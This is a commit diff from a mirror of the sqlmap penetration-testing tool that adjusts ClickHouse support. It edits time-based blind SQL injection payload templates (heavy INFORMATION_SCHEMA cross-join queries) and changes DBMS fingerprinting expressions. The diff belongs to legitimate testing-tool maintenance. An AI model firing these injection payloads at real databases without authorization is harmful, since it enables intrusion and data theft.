sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Some fixes related to ClickHouse support (#5229)

Browse Source
This commit is contained in:
Miroslav Stampar 2023-02-03 23:30:05 +01:00
parent b1aaac5ba2
commit d7180d38c4
6 changed files with 16 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
data/xml/payloads/time_blind.xml
View File

@ -195,9 +195,9 @@
<risk>2</risk> <risk>2</risk>
<clause>1,2,3,8,9</clause> <clause>1,2,3,8,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector> <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<request> <request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload> <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
</request> </request>
<response> <response>
<time>[DELAYED]</time> <time>[DELAYED]</time>
@ -235,9 +235,9 @@
<risk>3</risk> <risk>3</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<request> <request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload> <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
</request> </request>
<response> <response>
<time>[DELAYED]</time> <time>[DELAYED]</time>
@ -276,9 +276,9 @@
<risk>2</risk> <risk>2</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector> <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<request> <request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload> <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -318,9 +318,9 @@
<risk>3</risk> <risk>3</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<request> <request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload> <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<comment>#</comment> <comment>#</comment>
</request> </request>
<response> <response>
@ -1628,9 +1628,9 @@
<risk>2</risk> <risk>2</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector> <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<request> <request>
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload> <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
</request> </request>
<response> <response>
<time>[DELAYED]</time> <time>[DELAYED]</time>

4
lib/core/dicts.py
View File

@ -270,7 +270,7 @@ HEURISTIC_NULL_EVAL = {
DBMS.ACCESS: "CVAR(NULL)", DBMS.ACCESS: "CVAR(NULL)",
DBMS.MAXDB: "ALPHA(NULL)", DBMS.MAXDB: "ALPHA(NULL)",
DBMS.MSSQL: "DIFFERENCE(NULL,NULL)", DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
DBMS.MYSQL: "QUARTER(NULL)", DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
DBMS.ORACLE: "INSTR2(NULL,NULL)", DBMS.ORACLE: "INSTR2(NULL,NULL)",
DBMS.PGSQL: "QUOTE_IDENT(NULL)", DBMS.PGSQL: "QUOTE_IDENT(NULL)",
DBMS.SQLITE: "UNLIKELY(NULL)", DBMS.SQLITE: "UNLIKELY(NULL)",
@ -288,7 +288,7 @@ HEURISTIC_NULL_EVAL = {
DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))", DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))", DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)", DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
DBMS.CLICKHOUSE: "coalesce(NULL)", DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
} }
SQL_STATEMENTS = { SQL_STATEMENTS = {

2
lib/core/enums.py
View File

@ -52,7 +52,7 @@ class DBMS(object):
PRESTO = "Presto" PRESTO = "Presto"
ALTIBASE = "Altibase" ALTIBASE = "Altibase"
MIMERSQL = "MimerSQL" MIMERSQL = "MimerSQL"
CLICKHOUSE = "Clickhouse" CLICKHOUSE = "ClickHouse"
CRATEDB = "CrateDB" CRATEDB = "CrateDB"
CUBRID = "Cubrid" CUBRID = "Cubrid"
CACHE = "InterSystems Cache" CACHE = "InterSystems Cache"

2
lib/core/settings.py
View File

@ -20,7 +20,7 @@ from thirdparty import six
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.7.2.1" VERSION = "1.7.2.2"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

2
plugins/dbms/clickhouse/__init__.py
View File

@ -18,7 +18,7 @@ from plugins.generic.misc import Miscellaneous
class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
""" """
This class defines Clickhouse methods This class defines ClickHouse methods
""" """
def __init__(self): def __init__(self):

2
plugins/dbms/mysql/fingerprint.py
View File

@ -175,7 +175,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "testing %s" % DBMS.MYSQL infoMsg = "testing %s" % DBMS.MYSQL
logger.info(infoMsg) logger.info(infoMsg)
result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL") result = inject.checkBooleanExpression("QUARTER(NULL XOR NULL) IS NULL")
if result: if result:
infoMsg = "confirming %s" % DBMS.MYSQL infoMsg = "confirming %s" % DBMS.MYSQL